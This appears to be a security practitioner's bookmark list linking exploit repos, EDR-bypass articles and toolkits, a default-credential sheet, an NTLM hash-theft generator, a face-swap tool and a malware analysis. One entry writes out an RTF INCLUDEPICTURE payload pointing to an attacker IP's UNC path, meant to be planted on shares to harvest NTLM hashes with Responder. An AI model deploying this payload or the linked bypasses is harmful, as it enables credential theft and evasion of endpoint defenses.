GitHub - mohamedbenchikh/CVE-2022-27925
https://github.com/mohamedbenchikh/CVE-2022-27925

- start.me
https://start.me/p/DPYPMz/the-ultimate-osint-collection

GitHub - urbanadventurer/WhatWeb: Next generation web scanner
https://github.com/urbanadventurer/whatweb

Bypass CrowdStrike Falcon EDR protection against process dump like lsass.exe | by bilal al-qurneh | Sep, 2022 | Medium
https://medium.com/@balqurneh/bypass-crowdstrike-falcon-edr-protection-against-process-dump-like-lsass-exe-3c163e1b8a3e

GitHub - ihebski/DefaultCreds-cheat-sheet: One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password 🛡️
https://github.com/ihebski/DefaultCreds-cheat-sheet

GitHub - root-tanishq/userefuzz: User-Agent , X-Forwarded-For and Referer SQLI Fuzzer
https://github.com/root-tanishq/userefuzz

Sneaky long-term op tech: drop a Word doc with the following embedded "image" on shares:

'{\\rtf1{\\field{\\*\\fldinst {INCLUDEPICTURE "file://<kail ip>/a.jpg" \\\\* MERGEFORMAT\\\\d}}{\\fldrslt}}}'

Word auto-includes imgs from UNC paths; with Responder, catch hashes.

GitHub - optiv/Freeze: Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
https://github.com/optiv/Freeze

GitHub - iperov/DeepFaceLive: Real-time face swap for PC streaming or video calls
https://github.com/iperov/DeepFaceLive

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
https://github.com/Greenwolf/ntlm_theft

GitHub - last-byte/PersistenceSniper: Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines.
https://github.com/last-byte/PersistenceSniper

Snakes on a Domain: An Analysis of a Python Malware Loader
https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader